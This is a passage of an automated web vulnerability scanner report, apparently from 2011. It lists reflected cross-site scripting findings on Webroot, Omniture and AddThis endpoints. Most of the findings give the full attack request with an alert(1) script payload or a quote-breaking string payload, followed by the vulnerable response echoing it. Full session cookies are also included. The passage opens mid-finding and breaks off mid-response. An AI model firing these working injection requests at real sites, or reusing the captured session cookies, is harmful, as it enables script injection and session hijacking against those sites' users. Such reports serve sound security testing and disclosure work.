Path:   /ci/redirect/enduser/enduser/ask.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d35f0<script>alert(1)</script>ba7454ce186 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /ci/redirect/enduserd35f0<script>alert(1)</script>ba7454ce186/enduser/ask.php?p_sid=bw7EGuDk HTTP/1.1
Host: support.webroot.com
Proxy-Connection: keep-alive
Referer: http://www.webroot.com/En_US/support.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op670worryfreegum=a00501e0042797q07l2qj8fbc; op670worryfreeliid=a00501e0042797q07l2qj8fbc; s_vnum=1318008426626%26vn%3D1; s_vi=[CS]v1|2733B1860501303E-60000113001F5CD6[CE]; v39=En_US%20%7C%20Business%20%7C%20Landing%20%7C%20Index; pageName=En_US%20%7C%20Business%20%7C%20Landing%20%7C%20Index; IS3_GSV=DPL-2_TES-1315417966_PCT-1315417966_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; IS3_History=1314429892-2-89_4-2-+3--2__4-3_4-3; s_nr=1315418096331; s_lv=1315418096335; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; __utma=43535610.1371063031.1315416427.1315416427.1315416427.1; __utmb=43535610.5.10.1315416427; __utmc=43535610; __utmz=43535610.1315416427.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/; s_sq=webrootglobalprod%2Cwebrootprod%3D%2526pid%253DEn_US%252520%25257C%252520Unassigned%252520%25257C%252520Search%252520results%252520%25257C%252520Search-results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fsupport.webroot.com%25252F%2526ot%253DA; cp_session=aU6KnGJ1JsmocTdJJ9D4NT%7Eax32PQonvKOjBTtCbDqRsxsWp%7Eyja6yVSIpzLXGR3f3Td9wg9q4XWcr3R1qv_FC2i3e3TTwK90I3zqHDbMHnrKtQeVbd2mGcGmx0Mpmd6%7Ecn16wsQWH%7Egq_kVVQfuSIn_8dfY1C2dF7; mbox=session#1315416421019-244022#1315419962|PC#1315416421019-244022.19#1331229302|check#true#1315418162

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:58:18 GMT
Server: Apache
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUzowsmOqRvl7bf_Ciby9BcENyvvKQkxpn2jwytWqIUAjaHynGEd8t04KrTo8CtaWkwMe%7En%7E4p3FldeYkijf2Jeqk8DLBdVvaip4sGZaug04FY8qf5zcSaNRTp9MfoIP2DRYxAIqHAveNr0P8YA54UdM3BuUUzIrOEx3vLDJIHKBG3LuMQ7uunCastKzowa%7EYbHKUUZ5ALQlEQvUqnKEuCX2kDe4a3qbt8J60W4LaQ8OgzncXUVZ6Cl57mfZlg1936uo213vRvx7UGho2BP1w3Zo2rp%7E0XbukR6nUQ6slryDfxJBNh__YdRnnYtW7sYcVvcDhBagvm9FZWIVFr4K0jArEZjdA5j_diKGWJ5F26puX_OxzSYuZ%7EBw%21%21; path=/; httponly
RNT-Time: D=106460 t=1315400298321215
RNT-Machine: 01
Vary: Accept-Encoding
Content-Length: 18144
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<hea
...[SNIP]...
<p>Page /ci/redirect/enduserd35f0<script>alert(1)</script>ba7454ce186/enduser/ask.php?p_sid=bw7EGuDk not found.</p>
...[SNIP]...

1.128. http://updates.webroot.com/autorenewal/auto_renewal_optout.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://updates.webroot.com
Path:   /autorenewal/auto_renewal_optout.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41245"><script>alert(1)</script>426159b056e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /autorenewal/auto_renewal_optout.php/41245"><script>alert(1)</script>426159b056e HTTP/1.1
Host: updates.webroot.com
Proxy-Connection: keep-alive
Referer: http://www.webroot.com/En_US/support.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op670worryfreegum=a00501e0042797q07l2qj8fbc; op670worryfreeliid=a00501e0042797q07l2qj8fbc; s_vnum=1318008426626%26vn%3D1; s_vi=[CS]v1|2733B1860501303E-60000113001F5CD6[CE]; v39=En_US%20%7C%20Business%20%7C%20Landing%20%7C%20Index; pageName=En_US%20%7C%20Business%20%7C%20Landing%20%7C%20Index; IS3_GSV=DPL-2_TES-1315417966_PCT-1315417966_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; IS3_History=1314429892-2-89_4-2-+3--2__4-3_4-3; mbox=session#1315416421019-244022#1315419962|PC#1315416421019-244022.19#1331229302|check#true#1315418162; __utma=43535610.1371063031.1315416427.1315416427.1315416427.1; __utmb=43535610.6.10.1315416427; __utmc=43535610; __utmz=43535610.1315416427.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/; s_nr=1315418113012; s_lv=1315418113014; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:55:02 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 20544


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Webroot Software</ti
...[SNIP]...
<form id="standardform" action="/autorenewal/auto_renewal_optout.php/41245"><script>alert(1)</script>426159b056e" method="post">
...[SNIP]...

1.129. http://webroot.tt.omtrdc.net/m2/webroot/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://webroot.tt.omtrdc.net
Path:   /m2/webroot/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 121f5<script>alert(1)</script>5cffe219be1 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/webroot/mbox/standard?mboxHost=www.webroot.com&mboxSession=1315416421019-244022&mboxPage=1315416421019-244022&screenHeight=1200&screenWidth=1920&browserWidth=1266&browserHeight=909&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=us-subfooter-cc121f5<script>alert(1)</script>5cffe219be1&mboxId=0&mboxTime=1315398421465&mboxURL=http%3A%2F%2Fwww.webroot.com%2FEn_US%2Fland-3up-wisc-wav-ss.html&mboxReferrer=http%3A%2F%2Fallthingsd.com%2F20110906%2Fbring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves%2F%23&mboxVersion=39 HTTP/1.1
Host: webroot.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.webroot.com/En_US/land-3up-wisc-wav-ss.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315416421019-244022.19; Domain=webroot.tt.omtrdc.net; Expires=Thu, 08-Mar-2012 12:28:11 GMT; Path=/m2/webroot
Content-Type: text/javascript
Content-Length: 211
Date: Wed, 07 Sep 2011 12:28:11 GMT
Server: Test & Target

mboxFactories.get('default').get('us-subfooter-cc121f5<script>alert(1)</script>5cffe219be1',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315416421019-244022.19");

1.130. http://www.addthis.com/api/nai/optout [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3196c<script>alert(1)</script>7f76aab143d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api3196c<script>alert(1)</script>7f76aab143d/nai/optout?nocache=0.8288083 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,95|36

Response

HTTP/1.0 404 Not Found
Date: Wed, 07 Sep 2011 12:46:19 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1413
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>api3196c<script>alert(1)</script>7f76aab143d/nai/optout?nocache=0.8288083</strong>
...[SNIP]...

1.131. http://www.addthis.com/api/nai/optout [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92d7c"-alert(1)-"1cc2458db2f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api92d7c"-alert(1)-"1cc2458db2f/nai/optout?nocache=0.8288083 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,95|36

Response

HTTP/1.0 404 Not Found
Date: Wed, 07 Sep 2011 12:46:19 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/api92d7c"-alert(1)-"1cc2458db2f/nai/optout";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

1.132. http://www.addthis.com/api/nai/optout [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2dcf2<script>alert(1)</script>518a91a0a09 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/nai2dcf2<script>alert(1)</script>518a91a0a09/optout?nocache=0.8288083 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,95|36

Response

HTTP/1.0 404 Not Found
Date: Wed, 07 Sep 2011 12:46:21 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1413
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>api/nai2dcf2<script>alert(1)</script>518a91a0a09/optout?nocache=0.8288083</strong>
...[SNIP]...

1.133. http://www.addthis.com/api/nai/optout [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15b4a"-alert(1)-"3ff7ce65817 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/nai15b4a"-alert(1)-"3ff7ce65817/optout?nocache=0.8288083 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,95|36

Response

HTTP/1.0 404 Not Found
Date: Wed, 07 Sep 2011 12:46:20 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/api/nai15b4a"-alert(1)-"3ff7ce65817/optout";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

1.134. http://www.addthis.com/api/nai/optout [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 10e5b<script>alert(1)</script>6e3a323e6bf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/nai/optout10e5b<script>alert(1)</script>6e3a323e6bf?nocache=0.8288083 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,95|36

Response

HTTP/1.0 404 Not Found
Date: Wed, 07 Sep 2011 12:46:23 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1413
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>api/nai/optout10e5b<script>alert(1)</script>6e3a323e6bf?nocache=0.8288083</strong>
...[SNIP]...

1.135. http://www.addthis.com/api/nai/optout [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1b47"-alert(1)-"d9497451a76 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/nai/optouta1b47"-alert(1)-"d9497451a76?nocache=0.8288083 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,95|36

Response

HTTP/1.0 404 Not Found
Date: Wed, 07 Sep 2011 12:46:22 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/api/nai/optouta1b47"-alert(1)-"d9497451a76";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

1.136. http://www.addthis.com/api/nai/status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4389"-alert(1)-"e8fbdc2b414 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apie4389"-alert(1)-"e8fbdc2b414/nai/status?nocache=0.8315244 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,92|36

Response

HTTP/1.0 404 Not Found
Date: Wed, 07 Sep 2011 12:26:40 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/apie4389"-alert(1)-"e8fbdc2b414/nai/status";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

1.137. http://www.addthis.com/api/nai/status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ba971<script>alert(1)</script>4b785aea6d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apiba971<script>alert(1)</script>4b785aea6d1/nai/status?nocache=0.8315244 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,92|36

Response

HTTP/1.0 404 Not Found
Date: Wed, 07 Sep 2011 12:26:41 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1413
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>apiba971<script>alert(1)</script>4b785aea6d1/nai/status?nocache=0.8315244</strong>
...[SNIP]...

1.138. http://www.addthis.com/api/nai/status [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/status

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fcedb<script>alert(1)</script>4c88d6f4c58 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/naifcedb<script>alert(1)</script>4c88d6f4c58/status?nocache=0.8315244 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,92|36

Response

HTTP/1.0 404 Not Found
Date: Wed, 07 Sep 2011 12:26:42 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1413
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>api/naifcedb<script>alert(1)</script>4c88d6f4c58/status?nocache=0.8315244</strong>
...[SNIP]...

1.139. http://www.addthis.com/api/nai/status [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/status

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d050e"-alert(1)-"337cc64e2aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/naid050e"-alert(1)-"337cc64e2aa/status?nocache=0.8315244 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,92|36

Response

HTTP/1.0 404 Not Found
Date: Wed, 07 Sep 2011 12:26:42 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/api/naid050e"-alert(1)-"337cc64e2aa/status";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

1.140. http://www.addthis.com/api/nai/status [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/status

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8937a"-alert(1)-"f049c6759df was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/nai/status8937a"-alert(1)-"f049c6759df?nocache=0.8315244 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,92|36

Response

HTTP/1.0 404 Not Found
